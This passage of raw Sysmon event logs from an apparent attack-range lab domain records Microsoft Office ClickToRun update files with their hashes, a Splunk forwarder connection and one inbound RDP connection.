Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientPreview_eula.txtMD5=3A58ED33B73DA8337FD97D86B8B44404,SHA256=725A06CA6762295D6F2A5B401DF21AFB3DC666D3DD6E82634D129B36576FFA75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientOSub_eula.txtMD5=BB0DB45C09B92781D0EF1CA2CD32F18B,SHA256=A429C48FFA604AEFCFB4A742CACD7CA3C1DDE84A38DFB498C677CA6E1B27F977,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientOSub2019_eula.txtMD5=AC154D8A3B1315E61E5905FC6FCF547D,SHA256=07FB57B9DD876615FED4EFCD8A0F138E69C935E952B87FF2F4115125E06A88AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientLangPack_eula.txtMD5=48E7D4A8154B5D4421664066DDD1685A,SHA256=5509FC4ED3F1FE5C35E6DCBDD4EAEA0C617D886A6C756078B8EC5A520DB01A99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientLangPack2019_eula.txtMD5=8C19D287750807D3AD86903C192CD5E4,SHA256=E33CB6AC5C64F7EFE958E87ED6F4F96563E3AA541EA96E993AFC5F5B64464478,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientARMRefer_eula.txtMD5=8FD374C4F2048EFFC4934FCC31D2B81A,SHA256=AC6A8306EBB2437D325FE8D82BD92BB9DEEB5DFD2D62F4D8F2D8AAAD888A0758,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.033{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientARMRefer2019_eula.txtMD5=AC154D8A3B1315E61E5905FC6FCF547D,SHA256=07FB57B9DD876615FED4EFCD8A0F138E69C935E952B87FF2F4115125E06A88AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\Client2019_eula.txtMD5=8BC382F5C7EF62C994061019EF544A3C,SHA256=118C396755991EA839015FA7C222AE8B45EE8DFD1F5E8EF4513B5F24DB09B792,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\CERTINTL.DLLMD5=3B97FD336D50378D5D4FC983BE9C54E8,SHA256=37DDDB113B05F857BA42CA64F7F56BB2E4EEEDD1FC93C350E61795C089B22F0A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\BHOINTL.DLLMD5=68CF53B4B445C81AE2C732D2D5E56DAB,SHA256=BE8CB9463C6D6EAF000DFBDA0BBB08E71D2CC59CC1B8AE15743FEDB16C595153,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\BCSRuntimeRes.dllMD5=9A074043C5E17BAD6CBE5DA728B81A10,SHA256=27327AE68DD50F7672A40C5F2B95EE152AC7FB289F2CE0C3E9C9A38A4DECAA52,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ACWIZRC.DLLMD5=28D0C7FF7EA8C21C1A41043E09BF6372,SHA256=2854BC07949085C93B10A54B435995A176108BB0BFAB70C4E5A6E7A064AB5B11,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.017{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ACTIP10.HLPMD5=030C1826C426DD6EC659013544D40F2B,SHA256=F4E2A7FF9C9FAB3C94556E10241F470FF200F20259D4C898B96C8B5516CE7A62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ACCOLKI.DLLMD5=E7B9FFB42FA955B594E4CDC7DC11A8C9,SHA256=68732521E7FB36C1B64C10BD7431A9625C98AC14D4520CD10DC1CA320E0D7456,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ACCESS_WHATSNEW.XMLMD5=0C9586700D66A72C7AAEFCB142E09584,SHA256=06D262200A1B09B7E9AF77C6E160B7D4258F433025ED1332658A778CB99EF1AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\AccessRuntime_eula.txtMD5=D731F3C8B73EB9F30B1881D0EB95AC53,SHA256=92E45F7F48EA0458B448B091ED828C1C71266938A08DA727C7172D2A097AC04D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\AccessRuntime2019_eula.txtMD5=79D594F981B4EEA2FA5941D30A55A576,SHA256=0AF4B6A3C4EA9213913660BB152A0EEC55241B1AC77FC72C99F777A4EA394F6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:16.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ACCESS12.ACCMD5=27C2D3E6786CE78F77F45F8B6AEEC97C,SHA256=A48208897580355DBFD87FF55D3AFA5153F359F1B70F9FC01770F5CEBB7BB814,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\word2013bw.dotxMD5=9341EE5031DCD4E2F19D4851E144CFBA,SHA256=086F00BF7F0E1F677B3DED5F1D7C0012D18084B6ACC72A5341AB44051EF9EF83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:15.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\QuickStyles\word2013.dotxMD5=4A6393AF61BF1DC7C92A6A715C938263,SHA256=FD625C6B304B5B8172866072290B2BAB627032EEF94E836931E6C7260F22B56E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049735Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:14.689{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52496-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049734Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:14.477{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51416-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049733Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:16.627{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F721AE937744AD4B97FFDBADFB94150E,SHA256=39F51B17EEAF2CF48B7B3EF13E3545060B8163A7C074ABE4E8D57DBA8329C9B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.Extensions.dllMD5=0DD4B7F36F23EBD6BB6F76E0F3A0A1EE,SHA256=66FAE69EDB9DC35DCD54393ED4949E45255B257F2D25D64F31B9CB93DF8D7DA2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.EditorRibbon.dllMD5=AEF2790E4A5A1E30778062C4D2BC9809,SHA256=032C3748EF1988CC5475C92ACEC00AC3C33A451135B897253CE131A2D75F9D59,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.dllMD5=D99521D45504673CF23B85F81DA4A7A5,SHA256=763353D10126AB4C59CD9EB6481CE690789A45515020403156954D4BB39411A5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.AddinTelemetry.dllMD5=667ABEA207BFFA1078F4122A9A45DA4F,SHA256=C25F83362A1A5F8BC918607A160A6C8F8060B03A99C2B4BB54779C7583979C7D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.HostIntegration.Connectors.dllMD5=89FB8478D579A3F64AD8F85F54499B1F,SHA256=83B8516F1F63B6448A9124F0FB7BD898D177C4821FC432E8481A4E31E4A570A2,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Exchange.WebServices.dllMD5=359F0E9B93011F95784828E334EC49EC,SHA256=AFA3C09DC7A1BFAF794C1566DBB7613F8BA7DE72C5CC7E55B785DA669DEB2466,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.DataIntegration.TransformDataByExample.dllMD5=460E504C89F296E99454D1E0CF67079F,SHA256=AFB4679A8F5D014B259E52329B0E1CB4EF3DB408E9A4FE4732FD67674FD995BD,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.DataIntegration.FuzzyMatchingCommon.dllMD5=F4B7C8EE0EBB573BAD66A218E207E61F,SHA256=78FC99DBCE0F3CB9E5ECB85FAABA254918080DB99C8CB77B47DC91FF94FD91F4,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.DataIntegration.FuzzyMatching.dllMD5=44D7CFACBDE5AF4B3E8E01E074B3B8C8,SHA256=3C1B87E41947CE8C23C1DCE07A733CDA2D09B9B65D138622EC75213455D2D084,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Data.SapClient.dllMD5=5A0F74EB21AAF10F09C330DD3E925C28,SHA256=D3802A8425BC7EB46D64A91BCEA235904EF07FB30AD6C10B090A55AD30DCB57B,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Data.OData.Query.NetFX35.dllMD5=14C4F59E995167E93B831B64013B5834,SHA256=0DE20D1ED71FE7438147CD424AC987324A4AA6103C7B7B024378C187E13279C8,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.486{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Data.OData.NetFX35.dllMD5=4800C92A11BD1C804C454EAAE106601C,SHA256=7EE17FD976F8A32554D54FD4E7135751F00B9E193E2EAF1352D0681C9C2D0CEA,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Data.Edm.NetFX35.dllMD5=25FB20E81A8FD9AE24A0905AD11D2CB6,SHA256=A5B07480973750E12BF8D7D8604467A6537C9A0E9DF78148E2276814F5973767,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.455{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\mashupcompression.dllMD5=05F34AF7751CC6CCBEAD9C320BEDD8B2,SHA256=043C2ACC63A6030E50FC03DEFECA7D79ADEA60E9D679E44E3AA905F463EF4BEF,IMPHASH=5DBDDEB74328804FEDA79320977C4600truetrue 23542300x800000000000000068595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\System.ValueTuple.dllMD5=D01BEB7BC16872ED93E23D1A34260008,SHA256=DAD592CA7387D602008667C990001C57BABA1FF2E814FDA54027086ECF8927EB,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\System.Runtime.InteropServices.RuntimeInformation.dllMD5=BC9819835281B94C21CA20A973B2D3CB,SHA256=6D16405CCA5A74B116F7423F25A5A1BC9CAA1CDD3C3C6DDAD54F9E7B0790C3D1,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MsoAriaCApiWrapper.dllMD5=3128F02F1ACE770F864DEEF0C5D383FE,SHA256=ED4C57F4CDB299E51AF7F7C93736C556DA8CE5A783F75AB9C4A78A7344950EFD,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000068592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vstoMD5=B19572949E4313A74102AB18464D630B,SHA256=51755ED632FDEA73C9C7D659F7ED11CE9DBA4BB762CCF621D976188CC81A74D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.dll.manifestMD5=32B62639BA3E00DFED81E0592B517E42,SHA256=BD58B3E3EEA6E46E131553414A35410B9017C95B779334BB617213435980EFAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.dll.configMD5=DFE6CEA1B7E5331CC062431D7D9EB0E6,SHA256=005DF8ADBF06FA39A5600EA5F4CE420B4037C3C18BAED099FBA02FA7BF9B8DD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:17.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.dllMD5=B204A1C2B9B18A84F7F0ECD7CFA13809,SHA256=27238E7B757726207C75C8F6280DE627D7F2C8E259F28E13E3545900A67221FB,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 